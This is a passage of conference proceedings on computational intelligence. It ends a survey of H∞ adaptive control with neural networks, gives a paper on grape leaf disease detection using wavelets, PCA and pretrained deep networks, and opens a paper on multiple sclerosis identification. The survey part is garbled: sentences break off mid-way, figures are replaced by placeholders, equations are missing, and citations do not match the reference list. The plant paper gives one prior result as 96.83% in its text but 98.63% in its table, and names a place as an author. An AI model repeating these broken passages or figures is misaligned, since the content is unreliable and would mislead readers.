decomposing the neural network into its nodes, a plausible formulation of the
processing carried out by the network, viewed from a single output, becomes
possible. For updating the weights, the back propagation algorithm is an LMS-like
computation [15].
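As a minimal sketch of this procedure (the layer sizes, learning rate, and iteration count are hypothetical choices, not from the survey), a feed-forward network with one sigmoidal hidden layer can be trained on the XOR problem by back propagation:

```python
import numpy as np

rng = np.random.default_rng(1)

# XOR training patterns and targets
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
Y = np.array([[0], [1], [1], [0]], dtype=float)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

# one hidden layer of 4 sigmoidal nodes; weights initialized randomly
# (not at zero, so nodes on a layer do not stay identical -- see the text above)
W1 = rng.normal(size=(2, 4)); b1 = np.zeros(4)
W2 = rng.normal(size=(4, 1)); b2 = np.zeros(1)

def forward(X):
    H = sigmoid(X @ W1 + b1)          # hidden-layer outputs
    return H, sigmoid(H @ W2 + b2)    # network output

_, O0 = forward(X)
loss_init = np.mean((O0 - Y) ** 2)

lr = 0.5
for _ in range(20000):
    H, O = forward(X)
    # back propagation: output-layer deltas first, then hidden-layer deltas
    dO = (O - Y) * O * (1 - O)
    dH = (dO @ W2.T) * H * (1 - H)
    W2 -= lr * H.T @ dO; b2 -= lr * dO.sum(axis=0)
    W1 -= lr * X.T @ dH; b1 -= lr * dH.sum(axis=0)

_, O1 = forward(X)
loss_final = np.mean((O1 - Y) ** 2)
```

The squared error decreases as the weights are adjusted layer by layer in the reverse direction.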
Throughout the training procedure, the outputs of the first layer are fed to the
second layer of nodes, and so on, until the output emerges from the neural network.
The error is determined by comparing the desired output with the actual output.
Since the output originates at the output node, the error is used to revise the
weights in the reverse direction through the neural network. One deficiency of this
weight-adjustment scheme is that the weights of a large number of nodes on the
same layer cannot be identical, because the weights are balanced through a
per-node adjustment: nodes that start with indistinguishable weights on a layer
would remain indistinguishable. The weights are adjusted on each layer, but if the
majority of the network's weights were initially set to zero, the resulting
mathematical model would behave as if each layer had a single node.
Initializing the weights randomly is therefore a further requirement for searching
the weight space properly. However, randomly initialized weights make it
extremely hard to assess the fundamental performance of a controller design.
Feedback (or recurrent, or interactive) networks can have signals traveling in both
directions, by introducing loops in the network. Feedback networks are very
powerful and can get extremely complicated. Computations derived from earlier
input are fed back into the network, which gives them a kind of memory. Feedback
networks are dynamic; their 'state' changes continually until they reach an
equilibrium point. They remain at the equilibrium point until the input changes, and
a new equilibrium must then be found.
As an example of a feedback network, consider Hopfield's network. The primary
use of Hopfield's network is as associative memory. An associative memory is a
device which accepts an input pattern and produces as output the stored pattern
most closely associated with that input. The function of the associative memory is
to recall the corresponding stored pattern and then produce a clean version of the
pattern at the output. Hopfield networks are typically used for problems with binary
pattern vectors, where the input pattern may be a noisy version of one of the stored
patterns. In the Hopfield network, the stored patterns are encoded as the weights of
the network.
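A minimal sketch of such an associative memory (the two 8-bit patterns are hypothetical, not from the survey); the stored patterns are encoded in the weight matrix by the Hebbian rule:

```python
import numpy as np

# two stored binary (+1/-1) patterns
patterns = np.array([
    [ 1, -1,  1, -1,  1, -1,  1, -1],
    [ 1,  1,  1,  1, -1, -1, -1, -1],
])

n = patterns.shape[1]
# Hebbian rule: the patterns are encoded in the weights
W = (patterns.T @ patterns) / n
np.fill_diagonal(W, 0)   # no self-connections

def recall(x, steps=10):
    """Iterate the network until it settles on a stored pattern."""
    x = x.copy()
    for _ in range(steps):   # synchronous updates
        x = np.where(W @ x >= 0, 1, -1)
    return x

# noisy version of the first stored pattern: flip one bit
noisy = patterns[0].copy()
noisy[2] *= -1
out = recall(noisy)
```

Starting from the one-bit-corrupted input, the network settles back onto the first stored pattern.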
3 Adaptive Controllers
(Figures: block diagrams of the controller–plant feedback configurations, with Σ denoting the summing junction.)
on its past output. Hence, with the incorporation of past inputs and outputs, the
approximation capability of an RNN is viewed as much superior to that of an MLP.
The basics of artificial neural networks are well explained by Simon Haykin in
Neural Networks [7, 8]. Irrespective of design, training and validation proceed as
two separate phases. When the network is periodically updated to get a
progressively better understanding of the plant while the plant is operating, it is
called 'online' trained. The network is called 'offline' trained when the training and
the utilization (or validation) phases are separated in time.
Neural networks have been used for system identification and control of various
plants, for example industrial robots, commercial and fighter aircraft, automobiles,
power generation, motors and drives, and chemical processes [4]. Werbos has
grouped neural networks for control into five general classes, namely:
1. Supervisory controller,
2. Inverse controller,
3. Adaptive controller,
4. Back propagation with utility,
5. Adaptive critic-based controller (Fig. 3).
The most straightforward type of neural network controller is of the supervisory
sort. Here, a network learns to mimic another controller (supervisor) by training
with input and output data from the parent controller. This is often described as a
strategy that mimics the behavior of another person or a system. In general, a
supervisory neural controller performs exactly as well as the human expert it
imitates, no better. In any case, in most cases this technique uses an
4 H∞ Controller
The "infinity" in H∞ means that this type of control is designed to impose minimax
constraints, in the sense of decision theory, in the frequency domain. The fundamental
problem of the H∞ control scheme is, roughly, to optimize (by choice of
compensator in a standard feedback configuration) some worst-case (i.e.,
infinity-norm) measure of performance while preserving stability [14].
In H∞ control, we consider the following closed-loop system representation
with an "extended system":
• w is an exogenous input (m1 × 1) containing at least the reference signal r and
possibly other exogenous signals such as a noise model n.
• z is the performance output (p1 × 1), a virtual output signal used only for design.
• ũ is the control input (m2 × 1), computed by the controller C(s). ỹ is the measured
output (p2 × 1), available to the controller C(s) (Fig. 4).
(Fig. 4: the standard feedback configuration, with the controller C(s) mapping the measured output y to the control input u.)
To achieve robust adaptive control, we need not only to identify the nominal plant but also to quantify the model uncertainty in the adaptive modeling part. Moreover, we need to use both the nominal plant model and the measure of model uncertainty to self-tune the adaptive control law based on H∞ robust control. The problem is the equivalence of the two least-squares algorithms, and under what conditions they are equivalent.
An obvious complication for the unification of identification and control in H∞ is the lack of recursive algorithms using real-time data. It is possible to transform the frequency domain least-squares algorithm into a time domain one [13].
The use of H∞ control for the control part also offers the opportunity to implement the resulting control law adaptively, because the H∞ norm is an induced two-norm (i.e., a measure of energy). This is also manifested by the H∞ performance index in the time domain [14]. The problem is clearly the computational complexity associated with H∞ design, which prohibits its implementation in real time. Recall that we do not know the true system, only the identified model, which is a function of time t. Thus, the H∞ controller would need to be redesigned for each identified plant, which is simply not possible in real time. A periodic signal is therefore injected to ensure persistent excitation at the plant input.
It can then be shown that the least-squares algorithm in the frequency domain is asymptotically equivalent to a specialized recursive least-squares algorithm [16]. Fortunately, the amplitude of the periodic signal is small, which keeps the resulting performance degradation small. Second, the time domain performance index is used to convert the infinite-horizon problem for H∞ control into a finite-horizon problem at each time instant. In this case, the two algebraic Riccati equations involved in H∞ control become Riccati difference equations that can be solved recursively, allowing real-time implementation of the robust model reference control.
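The recursive solution mentioned above can be sketched numerically. The minimal numpy example below runs the backward Riccati difference recursion in its standard LQ form (the H∞ version adds a γ-dependent disturbance term); the plant matrices are illustrative, not taken from the chapter:

```python
import numpy as np

def riccati_difference(A, B, Q, R, P_T, steps):
    """Backward recursion of the finite-horizon Riccati difference equation
    P_k = Q + A^T P_{k+1} A - A^T P_{k+1} B (R + B^T P_{k+1} B)^{-1} B^T P_{k+1} A.
    (LQ form shown; the H-infinity case adds a gamma-dependent disturbance term.)"""
    P = P_T.copy()
    for _ in range(steps):
        S = R + B.T @ P @ B
        P = Q + A.T @ P @ A - A.T @ P @ B @ np.linalg.solve(S, B.T @ P @ A)
        P = 0.5 * (P + P.T)  # enforce symmetry against round-off
    return P

# Toy, assumed discrete-time plant (illustrative only)
A = np.array([[0.9, 0.1], [0.0, 0.8]])
B = np.array([[0.0], [1.0]])
Q = np.eye(2)
R = np.array([[1.0]])
P = riccati_difference(A, B, Q, R, np.eye(2), steps=200)
```

Each backward step is cheap (a small linear solve), which is what makes the finite-horizon formulation attractive for real-time use; for a stable pair (A, B) the iterates settle to the algebraic Riccati solution.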
Under certain conditions, the finite-horizon H∞ control converges to the infinite-horizon H∞ control [15]. Hence, robust adaptive control can be achieved. Because the identified model is very inaccurate at the early stage of adaptive control, model validation is employed to monitor the closed loop system. If the system produces signals of undesirable size, the H∞ controller designed for the finite-horizon case must be shut off. This prevents the system from suffering extremely poor performance (Fig. 5).
6 Stability Analysis
ẋ = Ax + Bu + D f (x) (1)
A Literature Review on H∞ Neural Network … 351
Fig. 5 Identified model with the adjustable law controller
u_n = −K_x x + K_r r (4)
ẋ_m = A_m x_m + B_m r (5)
u = u_n − u_ad (6)
where u_ad will be defined shortly. Applying this controller to the system dynamics, we rewrite the system dynamics as
(8)
ė = A_m e + B u_ad + D w(t) (11)
ẋ_e = A_e X_e + B_e [e w]^T
u_ad = C_e X_e + D_e [e w]^T (12)
7 Conclusions
In this work, a broad literature survey is conducted on H∞ adaptive control design using neural networks for systems related to control frameworks. Different models are discussed in detail, and their suitability for specific applications is highlighted. A neural H∞ adaptive controller architecture is determined that enables a control designer to tune reference-model-following qualities through linear control design methods, to band-limit the adaptive control signal, and to treat unmatched uncertainty within a single design structure for systems with an unknown nonlinearity.
Neural networks can be considered as nonlinear function approximators (i.e., linear combinations of nonlinear basis functions), where the parameters of the networks are found by applying optimization methods. The optimization is carried out with respect to the approximation error measure. In general, it is sufficient to have a single hidden layer neural network (MLP, RBF or other) to learn the approximation of a nonlinear function. In such cases, general optimization can be applied to find the update rules for the synaptic weights.
References
1. Narendra, K. S., & Parthasarathy, K. (1990). Identification and control of dynamical systems
using neural networks. IEEE Transactions on Neural Networks, 1(1), 4–27.
2. Greene, M. E., & Tan, H. (1991). Indirect adaptive control of a two-link robot arm using
regularization neural networks. In Proceedings of the International Conference on Industrial
Electronics, Control and Instrumentation (Vol. 2, pp. 952,135).
3. Tanomaru, J., & Omatu, S. (1991). On the application of neural networks to control and inverted
pendulum: An overview. In Proceedings of the 30th SICE.
4. Jin, Y., Pipe, T., & Winfield, A. (1993). Stable neural network control for manipulators.
Intelligent Systems Engineering, 2(4), 213–222.
5. Brown, R. H., Ruchti, T. L., & Feng, X. (1993). Artificial neural network identification of
partially known + dynamic nonlinear systems. In Proceedings of 32nd Conference on Decision
and Control (Vol. 4, pp. 3694–3699).
6. Nordgren, R. E., & Meckl, P. H. (1993). An analytical comparison of a neural network and a
model-based adaptive controller. IEEE Transactions on Neural Networks, 4(4), 685–694.
7. Yao, B., & Tomizuka, M. (2001). Adaptive robust control of MIMO nonlinear systems in semi-strict feedback forms. Automatica, 37(9), 1305–1321.
8. Khalil, H. K. (2002). Nonlinear systems. Prentice Hall.
9. Hoagg, J. B., & Bernstein, D. S. (2004). Direct adaptive dynamic compensation for minimum
phase systems with unknown relative degree. In Proceedings of 43rd IEEE Conference on CDC
Decision and Control (Vol. 1, pp. 183–188).
10. Lavretsky, E., & Hovakimyan, N. (2005). Adaptive compensation of control dependent
modeling uncertainties using time-scale separation. In Proceedings and 44th IEEE Conference
on 2005 European Control Conference Decision and Control CDC-ECC ’05 (pp. 2230–2235),
12–15 December 2005.
11. Volyanskyy, K. Y., Calise, A. J., & Yang, B. J. (2006). A novel q-modification term for adaptive
control. In American Control Conference (p. 5).
12. Cao, C., & Hovakimyan, N. (2006). Design and analysis of a novel l1 adaptive controller,
part1: Control signal and asymptotic stability. In Proceedings of American Control Conference
(pp. 3397–3402), 14–16 June 2006
13. Yu, B., Shi, Y., & Huang, J. (2009). Step tracking control with disturbance rejection for networked control systems with random time delays. In Proceedings of the Joint 48th IEEE Conference on Decision and Control and 28th Chinese Control Conference (pp. 4951–4956), Shanghai, China.
14. Chadli, M., & Guerra, T. M. (2012). LMI solution for robust static output feedback control of discrete Takagi-Sugeno models. IEEE Transactions on Fuzzy Systems, 20(6), 1160–1165.
15. Wu, Z.-G., Shi, P., Su, H., & Chu, J. (2013). Network-based robust passive control for fuzzy
systems with randomly occurring uncertainties. IEEE Transactions on Fuzzy Systems, 21(5),
966–971.
16. Bouarar, T., Guelton, K., & Manamanni N. (2013). Robust non-quadratic static output feed-
back controller design for Takagi-Sugeno systems using descriptor redundancy. Engineering
Applications of Artificial Intelligence, 26(2), 739–756.
A Novel DWT and Deep Learning Based
Feature Extraction Technique for Plant
Disease Identification
1 Introduction
The agriculture sector contributes majorly to the income sources of India, and hence the contribution of the agriculture sector to the national economy is indisputable. About thirteen percent of the GDP depends on the agricultural sector. However,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 355
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_29
356 Kirti et al.
the diseases caused by various pathogens ruin the plant yield by up to 20–40%. Grape vines are one of the key sources for the agricultural and wine industries. The quantity and quality of vines should be up to the mark of market standards.
The detection of diseases in plants is often miscalculated when manual detection is used, and hence there is a need for automated systems which can detect diseases with the least number of manual interventions [1]. One of the main issues in disease detection is the similarity in the symptoms of different diseases. It is very hard to differentiate one disease from another [2]. So, the emphasis should be more on the feature extraction part of the system. Significant features yield a highly accurate system. Han and Shi computed the features using HSV, Lab
and YCbCr models which provided 91.3% accuracy with support vector machine
(SVM) and deep convolutional networks (DCNNs) [3]. Linear and quadratic local
binary patterns were used by Veerashetty and Patil for creating a feature vector which
was invariant to the rotation, illumination and scaling changes. The accuracy of 95%
was computed with multi-Kernel SVM classifier [4]. Thanjavur used DWT, SIFT
and GLCM features for detection of diseases in paddy fields. The system achieved
96.83% classification accuracy with KNN, ANN, NB and Multi SVM [5].
A system with color and grayscale information features was developed by Ghazal
and Mahmoud which used the pre-determined region of interest (ROI) pixels for the
objective of determining the probabilities for the pixels. The labels were refined with a Gauss-Markov random field model. The dice similarity coefficient provided a recognition rate of 90% [6]. Xiao and Ma extracted 21 features for the
processing which included the features based on color, texture and morphology.
Principal component analysis (PCA) was utilized for the purpose of reducing the
dimensionality. The classification accuracy was obtained as 95.63% with SVM and
back-propagation neural networks (BPNNs) [7]. The system developed by Ma and
Du used conventional as well as deep learning classifiers. The features extracted
for conventional classifiers were the average, contrast, correlation, energy, etc. from
different channels of different color models. The highest accuracy obtained using
SVM, random forest and AlexNet was 93.4% [8]. Hassanein and Gaber developed
a system for tomato disease detection which extracted the features using Gabor
Transforms and the feature selection process was done using the moth flame opti-
mization and rough set. The accuracy of 90.5% was achieved using KNN and SVM
[9]. Okra and Bitter gourd diseases were detected by Mondal and Kole using an
entropy discretization Method. Correlation coefficient was computed and provided a
recognition rate of 96.78% [10]. Yao and Chen developed a system which employed
the HOG, Gabor and LBP for feature extraction and provided an accuracy of 90.7%
[11]. The textural features LBP, CLBP and LTP were used by Kirti to detect the leaf scorch disease in the strawberry plant. The comparison among all three feature extraction techniques was made on the basis of the accuracy computed by an SVM classifier. The highest accuracy achieved was 97.60% [12]. Revathi and Hemalatha utilized
the swarm optimization in combination with SVM, BPN and fuzzy logic to detect the
disease in cotton plants which achieved an accuracy of 94% [13]. Zhou and Kaneko
detected foliar disease in Sugar Beet by using three features in combination with
L*a*b* color model and classified the images using SVM and template matching.
The algorithm provided an accuracy of 97.44% [14].
The remainder of the paper is organized as follows. The preliminary description, block diagram and algorithm description for the proposed novel DWT-DNN technique, along with the process of selecting the best decomposition level and sub-band, are explained in Sect. 2. The dataset and system specifications are described in Sect. 3, along with comparison graphs of performance between the 2 wavelets for level and sub-band selection; the results are discussed in the same section. The conclusion is presented in Sect. 4.
In this section, the preliminary description of the robust large-scale feature extraction based on DWT, the PCA-based large-scale RGB feature extraction, and the deep learning based classification technique for plant disease identification is presented.
The colored images (R, G, B individual channels) of plant leaves were decomposed up to four levels, since decomposition of the image is proven to be the best alternative for determining high-detail features, and it also provides a scale-invariant interpretation of the leaf image. Discrete wavelet transform (DWT) is employed for the investigation of the different sub bands that can help in efficiently extracting the significant distinct features of the leaves for disease detection.
Images were broken down into 4 different coefficient sets, as illustrated in Fig. 1, which are high frequency and low frequency (in three directions) in nature. The DWT (dwt(z)) is obtained by use of the function s(z), also called the scaling function, and the function w(z), which represents the wavelet, in Eq. 1 at decomposition level d:
\[
\mathrm{dwt}(z) \;=\; \sum_{x} l_d(x)\, 2^{d/2}\, s\!\left(2^{d} z - x\right) \;+\; \sum_{x} h_d(x)\, 2^{d/2}\, w\!\left(2^{d} z - x\right) \tag{1}
\]
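The paper's experiments use the db4 and bior 1.5 wavelets in MATLAB; the minimal numpy sketch below uses the simpler Haar wavelet instead, only to illustrate how one decomposition level of Eq. 1 splits a channel into the four sub-bands cA, cH, cV and cD:

```python
import numpy as np

def haar_dwt2(img):
    """One-level 2-D Haar DWT: returns the approximation cA and the detail
    sub-bands cH, cV, cD. Orthonormal scaling, so total energy is preserved."""
    img = np.asarray(img, dtype=float)
    a = img[0::2, 0::2]; b = img[0::2, 1::2]   # even rows
    c = img[1::2, 0::2]; d = img[1::2, 1::2]   # odd rows
    cA = (a + b + c + d) / 2.0                 # approximation (low-low)
    cH = (a + b - c - d) / 2.0                 # detail across row pairs
    cV = (a - b + c - d) / 2.0                 # detail across column pairs
    cD = (a - b - c + d) / 2.0                 # diagonal detail
    return cA, cH, cV, cD

# Example: decompose one 256 x 256 channel into four 128 x 128 sub-bands
channel = np.random.rand(256, 256)
cA, cH, cV, cD = haar_dwt2(channel)
```

Applying the function again to cA gives the next decomposition level, which is how the four levels compared in the paper are produced.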
As discussed above, the dimensionality of colored plant image features was very
high. After performing DWT and selecting large scale coefficients, there was a need
to reduce the feature sub-space, as it has been observed that computational time
of CPU was still very high. The processor was unable to handle a high amount of
processing of large sized dataset features. Therefore, principal component analysis
was utilized for reducing the size of training and test features of image space. The
main concept in the process of determining the PCA consists of the reduction of
dimensionality present in the input dataset which may contain a very high number of
interrelated components, while obtaining significant number of variations existing
in it. The above-mentioned task is done by converting each image into a one-dimensional column vector of weights. The training space i = [1 . . . I] represents the training images as column vectors IM_{i=[1...I]}, stacked to create a 2D matrix from which the mean m of all image vectors is subtracted.
The reduction in dimension was done by working in the reduced K × K space instead of the full N × N one, using the covariance matrix shown in Eq. 2. This space was called the reduced sub-space and provided the eigenvectors corresponding to the normalized eigenvalues, which were used to form a projection between the sub-spaces of the training and testing sets. The classification is performed by pre-trained DNNs.

\[
C_m \;=\; \sum_{i=1}^{I} (m - \mathrm{IM}_i)\,(m - \mathrm{IM}_i)^{T} \tag{2}
\]
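The K × K shortcut behind Eq. 2 (often called the snapshot trick) can be sketched in numpy; with I images of N pixels each and I << N, the eigenvectors of the small I × I Gram matrix are mapped back to eigenvectors of the large N × N covariance. The function name and sizes are illustrative:

```python
import numpy as np

def snapshot_pca(images, k):
    """images: I x N matrix (one flattened image per row); returns the top-k
    covariance eigenvectors and the projected features, computed via the
    small I x I Gram matrix instead of the N x N covariance."""
    X = images - images.mean(axis=0)          # subtract the mean image vector m
    G = X @ X.T                               # small I x I Gram matrix
    vals, vecs = np.linalg.eigh(G)            # eigenvalues in ascending order
    order = np.argsort(vals)[::-1][:k]        # keep the k largest
    vals, vecs = vals[order], vecs[:, order]
    U = X.T @ vecs / np.sqrt(vals)            # N x k, unit-norm eigenvectors
    return U, X @ U                           # basis and reduced features

rng = np.random.default_rng(0)
imgs = rng.random((20, 4096))                 # 20 images of 64 x 64 = 4096 pixels
U, features = snapshot_pca(imgs, k=5)
```

The eigendecomposition here is of a 20 × 20 matrix rather than a 4096 × 4096 one, which is exactly the memory and CPU saving the authors needed before passing features onward.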
The classification phase is one of the crucial steps in a disease detection system, since in this phase the system assigns class labels to the test images and computes the validation accuracy. Deep neural networks are excellent at handling large sized datasets to obtain significant features, and they provide better accuracy and results than other classifiers. They are applied using transfer learning and fine-tuned for the desired system, automatically learning the robustness hidden in the variations of the input dataset. Six types of pre-trained deep neural network architectures are utilized for feature vector formulation and classification, i.e.,
AlexNet, GoogleNet, ResNet-50, ResNet-101, Inception V3 and Xception [18]. The
pre-trained models are selected on the basis of accuracy gain and number of parameters. These architectures were pre-trained on the ImageNet database, which contains millions of images of objects from 1000 different classes; the class weights trained on the previous problem are reused for the system and fine-tuned according to the present problem.
The proposed novel technique based on DWT and deep learning, designed for feature extraction and classification for the identification of diseases in plants, incorporates multi-resolution analysis of the images, a dimensionality reduction process, and feature vector formulation and classification, which can help in improving the accuracy of the system, as illustrated in Fig. 2. The algorithm is described as follows:
1. The RGB images were loaded into the system and passed for the processing.
2. The R, G and B channels were separated out of the image.
3. The images obtained were decomposed up to 4 levels.
4. The multi-resolution analysis of the images was done using 2 wavelets, i.e., db4
and bior 1.5.
5. The dimensionality reduction process was then applied on the computed
coefficients by applying principal component analysis.
6. The R, G and B components were then concatenated to obtain a single RGB
image which was then passed into 6 types of DNNs.
7. Accuracy was computed with each DNN for every sub band and decomposition
level.
Fig. 2 Proposed novel DWT and deep learning based feature extraction technique for plant disease
identification
Fig. 3 Plant village dataset contained grape vine leaves: a healthy, b affected from black rot disease,
c affected from Esca (Black Measles), d affected from leaf blight disease (Isariopsis Leaf Spot)
In this section, the details about the dataset and the system specifications are provided.
The results between the two wavelets for the selection of level and sub-band selection
are discussed.
3.1 Dataset
The grape dataset from the plant village database was used for the work [19]. The dataset contained a total of 1600 RGB/color images, consisting of 400 images in each class. There were 4 distinct classes: the first class was labeled as the healthy class, and the remaining 3 classes were the ones with images of diseased leaves. The 3 diseases affecting the grape leaves were black rot disease, Esca (Black Measles) disease and leaf blight (Isariopsis Leaf Spot). The images were in .jpeg format with a resolution of 256 × 256 pixels. The images appeared to be captured against a monochrome background with no complexities, as demonstrated in Fig. 3.
A system with 8 GB RAM and a 2 GHz, 64-bit Intel Core i7 was used for the experiments. The processing was done with MATLAB 2020 installed on the system. Two types of experiments were done, one for each wavelet.
The images obtained from the concatenation of all the components (R, G, B) were then passed to the next stage, where the DNNs were applied for further processing. Accuracy was computed for different decomposition levels with different sub bands and DNNs. The highest accuracy achieved by db4 with level 1 decomposition was with the Inception V3 DNN at the cH sub band, i.e., 98.96%; with level 2 decomposition it was with the ResNet 101 DNN at the cA sub band, i.e., 98.13%; with level 3 decomposition it was with the Inception V3 DNN at the cA sub band, i.e., 97.92%; and with level 4 decomposition it was with the ResNet 50 and ResNet 101 DNNs at the cA sub band, i.e., 97.08%.
The second wavelet used in the multi-resolution analysis was the biorthogonal wavelet. The version bior 1.5 was applied on the images and the further decomposition levels. The highest accuracy achieved with level 1 decomposition was with the Inception V3 DNN at the cA and cD sub bands, i.e., 98.96%; with level 2 decomposition it was with the ResNet 101 DNN at the cV sub band, i.e., 98.54%; with level 3 decomposition it was with the Inception V3 DNN at the cD sub band, i.e., 98.54%; and with level 4 decomposition it was with the Inception V3 DNN at the cV sub band, i.e., 97.29%.
The system with db4 wavelet provided the highest accuracy of 98.96% when
compared with every sub band with each decomposition level. The cH sub band and
the decomposition level 1 was found to have the most significant features which can
provide the highest accuracy. The system with bior 1.5 wavelet provided the highest
accuracy of 98.96% when compared with every sub band with each decomposition
level. The cD sub band and the decomposition level 1 was found to have the most
significant features which can provide the highest accuracy, as shown in Fig. 4.
The comparison of accuracy between the wavelets db4 and bior 1.5 was made to
determine the best decomposition level and sub bands.
It was found that level 1 was the best decomposition level, at which the system provided the best accuracy of 98.96%, as shown in Fig. 5. The other comparison between the db4 and bior 1.5 wavelets was done to determine the best sub band. It was found that the cA sub band was the best sub band, at which the system provided the best accuracy of 98.80%. The wavelet db4 was determined to be the best for the particular system as it provided the highest accuracy among both the wavelets, i.e., 98.96%.
Fig. 4 Comparison of accuracy among sub band and level with a db4 wavelet, b bior1.5 wavelet
Fig. 5 Performance comparison between db4 wavelet and bior1.5 wavelet for a sub-band selection
and, b decomposition level selection
Table 1 Accuracy comparison of performance among the current approaches and the proposed approach

Approaches | Accuracy (%)
Ghazal and Mahmoud et al. [6] | 90
Hassanein and Gaber et al. [9] | 90.5
Yao and Chen et al. [11] | 90.7
Han and Shi et al. [3] | 91.3
Ma and Du et al. [8] | 93.4
Veerashetty and Patil et al. [4] | 95
Xiao and Ma et al. [7] | 95.83
Mondal and Kole et al. [10] | 96.78
Thanjavur et al. [5] | 98.63
DWT-DNN (proposed approach) | 98.96
The comparison between different approaches was made on the basis of the highest accuracy achieved, as shown in Table 1. Colored images were used in the proposed approach, while the other approaches converted the images into gray-scale images for easier computation. The other approaches used only the available resolution of the images, but the proposed approach used multi-resolution analysis to determine the best level at which the least memory was required by the system to process the images. The system performed well with no high-end GPU installed. The other approaches used SVM, KNN, decision trees and other classification techniques, which proved to be less accurate in comparison with the proposed approach's classification technique, i.e., DNNs.
It was observed that the proposed approach produced the highest accuracy among
the existing approaches, i.e., 98.96% as demonstrated in Fig. 6.
4 Conclusion
suited for the system. The db4 wavelet performed better than the bior 1.5 wavelet. The accuracy achieved by the system was 98.96%. The system handled the large dataset very efficiently, whereas existing machine learning techniques could not perform well with large datasets. In future, different families of wavelets will be explored and examined using different datasets for plant disease identification.
References
1. Giraddi, S., Desai, S., & Deshpande, A. (2020). Deep learning for agricultural plant disease
detection. In lecture notes in electrical engineering (pp 864–871). Springer.
2. Bisen, D. (2020). Deep convolutional neural network based plant species recognition through features of leaf. Multimedia Tools and Applications, 1–14. https://doi.org/10.1007/s11042-020-10038-w
3. Han, J., Shi, L., Yang, Q., et al. (2020). Real-time detection of rice phenology through convo-
lutional neural network using handheld camera images. Precision Agriculture. https://doi.org/
10.1007/s11119-020-09734-2
4. Veerashetty, S., & Patil, N. B. (2020). Novel LBP based texture descriptor for rotation, illumina-
tion and scale invariance for image texture analysis and classification using multi-kernel SVM.
Multimed Tools Applications, 79, 9935–9955. https://doi.org/10.1007/s11042-019-7345-6
5. Gayathri Devi, T., & Neelamegam, P. (2019). Image processing based rice plant leaves diseases in Thanjavur, Tamilnadu. Cluster Computing, 22, 13415–13428. https://doi.org/10.1007/s10586-018-1949-x
6. Ghazal, M., Mahmoud, A., Shalaby, A., El-Baz, A. (2019). Automated framework for accu-
rate segmentation of leaf images for plant health assessment. Environmental Monitoring and
Assessment, 191. https://doi.org/10.1007/s10661-019-7615-9
7. Xiao, M., Ma, Y., Feng, Z., et al. (2018). Rice blast recognition based on principal component
analysis and neural network. Computers and Electronics in Agriculture, 154, 482–490. https://
doi.org/10.1016/j.compag.2018.08.028
8. Ma, J., Du, K., Zheng, F., et al. (2018). A recognition method for cucumber diseases using leaf
symptom images based on deep convolutional neural network. Computers and Electronics in
Agriculture, 154, 18–24. https://doi.org/10.1016/j.compag.2018.08.048
9. Hassanien, A. E., Gaber, T., Mokhtar, U., & Hefny, H. (2017). An improved moth flame
optimization algorithm based on rough sets for tomato diseases detection. Computers and
Electronics in Agriculture, 136, 86–96. https://doi.org/10.1016/j.compag.2017.02.026
10. Mondal, D., Kole, D. K., & Roy, K. (2017). Gradation of yellow mosaic virus disease of okra
and bitter gourd based on entropy based binning and Naive Bayes classifier after identification
of leaves. Computers and Electronics in Agriculture, 142, 485–493. https://doi.org/10.1016/j.
compag.2017.11.024
11. Yao, Q., Chen, G., Wang, Z., et al. (2017). Automated detection and identification of white-backed planthoppers in paddy fields using image processing. Journal of Integrative Agriculture, 16, 1547–1557. https://doi.org/10.1016/S2095-3119(16)61497-1
12. Kirti, Rajpal, N., & Arora, M. (2021). Comparison of texture based feature extraction tech-
niques for detecting leaf scorch in strawberry plant (Fragaria × Ananassa). In A. Kumar, S.
Mozar (Eds.), Lecture notes in electrical engineering. ICCCE 2020. Lecture Notes in Electrical
Engineering (Vol. 698, pp 659–670). Springer.
13. Revathi, P., & Hemalatha, M. (2014). Cotton leaf spot diseases detection utilizing feature
selection with skew divergence method. International Journal of Science, Engineering and
Technology, 3, 22–30.
14. Zhou, R., Kaneko, S., Tanaka, F., et al. (2015). Image-based field monitoring of Cercospora
leaf spot in sugar beet by robust template matching and pattern recognition. Computers and
Electronics in Agriculture, 116, 65–79. https://doi.org/10.1016/j.compag.2015.05.020
15. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent & Fuzzy Systems, 35, 5265–5277. https://doi.org/10.3233/JIFS-169810
16. Yadav, J., Rajpal, N., & Vishwakarma, V. (2016) Face recognition using Symlet, PCA and
Cosine angle distance measure. In 2016 Ninth International Conference on Contemporary
Computing (IC3), Noida, U.P.
17. Yadav, J., Rajpal, N., & Mehta. R. (2019). An improved illumination normalization and robust
feature extraction technique for face recognition under varying illuminations. Arabian Journal
for Science and Engineering, 44, 9067–9086.
18. Lumini, A., & Nanni, L. (2019). Deep learning and transfer learning features for plankton
classification. Ecological Informatics, 51, 33–43. https://doi.org/10.1016/j.ecoinf.2019.02.007
19. GitHub—spMohanty/PlantVillage-Dataset: Dataset of diseased plant leaf images and corre-
sponding labels. https://github.com/spMohanty/PlantVillage-Dataset. Accessed 11 December
2020
Supervised and Unsupervised Machine
Learning Techniques for Multiple
Sclerosis Identification: A Performance
Comparative Analysis
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 369
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_30
370 S. Jain et al.
1 Introduction
Multiple sclerosis is a demyelinating disease in which the immune system of the body is severely affected: the antibodies attack directly and cause a communication breakdown between the brain and other parts of the body. Eventually, the disorder produces lifelong damage or deterioration of the nerves. Multiple sclerosis indications include pain, fatigue, and lack of coordination between the brain and other parts of the body. Various researchers are working in the domain of MSD identification, segmentation and classification of MS lesions in brain MR images. Machine learning performance is good in identification and segmentation tasks on brain MR images to find neurological diseases like tumors, MSD, Alzheimer's disease, etc.
